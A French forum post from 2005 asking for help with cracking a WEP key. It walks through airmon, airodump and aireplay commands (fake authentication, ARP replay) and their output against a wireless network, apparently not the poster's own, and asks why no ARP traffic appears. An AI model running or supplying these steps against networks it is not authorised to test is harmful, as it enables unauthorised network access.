Résultats de la recherche (Page 1) / Forum d'entraide: tuto-fr.com

#1 Re : Crack de clef wep » Postez ici votre histoire de wep cracking » 27-12-2005 19:55:04

Bonjour,

De guerre lasse, après de nombreuses tentatives infructueuses je lance cette bouteille à la mer.
J’utilise une carte pcmcia Netgear WG511T sous linux avec le CD live WHAX et en suivant à la lettre le tuto (remarquable) de Billyboylindien.
Voici le film :

1- J’ai créé une partition vfat de 3Go que je monte en /mnt/hda7 pour y enregistrer les captures

2- Sous root, je me mets en /mnt/hda7 d’où j’exécute tout le processus suivant

3- Passage de la carte en mode monitor:

    [email protected]:/mnt/hda7# airmon.sh start ath0

    usage: /usr/bin/airmon.sh <start|stop> <interface> [channel]
    Interface       Chipset         Driver
    ath0            Atheros         madwifi (monitor mode enabled)

    [email protected]:/mnt/hda7#

4- Découverte des réseaux par Airodump:

    [email protected]:/mnt/hda7# airodump ath0 out 0

    BSSID              PWR  Packets   LAN IP / # IVs  CH  MB  ENC  ESSID
    00:01:36:08:xx:xx   25     1107              850   1  11  WEP  Wifi_Mxxxx
    BSSID              STATION            PWR   Packets  ESSID
    00:01:36:08:xx:xx  00:04:23:6B:xx:xx   22       840  Wifi_Mxxxx

    NB: cette fois, il n'y avait qu'un réseau (dont les 4 dernières positions sont x-ifiées)
        je laisse tourner dans ce shell pour accumuler les captures

5- J'ouvre une autre console pour y lancer aireplay

6- Dans cette nouvelle console, je lance:

    [email protected]:/mnt/hda7# aireplay -1 0 -e Wifi_Mxxxx -a 00:01:36:08:xx:xx -b 00:01:36:08:xx:xx -h 00:04:23:6B:xx:xx ath0

    22:06:08  Sending Authentication Request
    22:06:10  Sending Authentication Request
    22:06:12  Sending Authentication Request
    22:06:12  Authentication successful
    22:06:12  Sending Association Request
    22:06:12  Association successful :-)

    [email protected]:/mnt/hda7#

    NB: on arrive donc bien à se faire accepter par l'AP. C'est bien ça?

7- Toujours depuis cette 2e console (alors que airodump, lui, tourne toujours dans la 1ere) je relance aireplay avec les paramètres -3 -x et -r comme ceci:
   
    [email protected]:/mnt/hda7# aireplay -3 -e Wifi_Mxxxx -a 00:01:36:08:xx:xx -b 00:01:36:08:xx:xx -h 00:04:23:6B:xx:xx -x 600 -r out.cap ath0

    Saving ARP requests in replay_arp-1226-221509.cap
    You must also start airodump to capture replies.
    Read ?????? packets (got 0 ARP requests), sent 0 packets...

    NB: le nb de packets est tombé hors de mon screen shot, mais je me souviens parfaitement qu'il était bien supérieur à 100000. Par contre, le nb d'ARP est toujours resté à 0. Donc si je ne capture pas d'ARP, c'est qu'il n'y a pas de trafic et s'il n'y a pas de trafic, il n'y a pas moyen de découvrir la clé WEP. C'est bien ça?

Dans la tonne de doc que j'ai compulsé, j'y ai trouvé des avis divergents. Certains soutiennent qu'il faut du trafic alors que d'autres affirment qu'on peut découvrir une clé WEP même si aucune station n'est active, pour autant que l'AP ne filtre pas les MAC Address (il y aurait un howto la-dessus, mais l'URL malheureusement n'est plus active) si qq'un a cette doc???

Enfin, je m'interroge sur le fait que si airodump a su me donner l'adresse MAC d'une station c'est bien que cette station était active non? Alors, pourquoi aireplay -3 n'arriverait pas à choper des ARP émis par cette station? Je divague? Rassurez moi.

Excusez moi pour la longueur de ce post, mais je pense que ce genre de film pourrait avoir des effets pédagogiques pour bon nombre de béotiens de mon genre, si toutefois il obtient une vraie réponse.

Merci d'avance.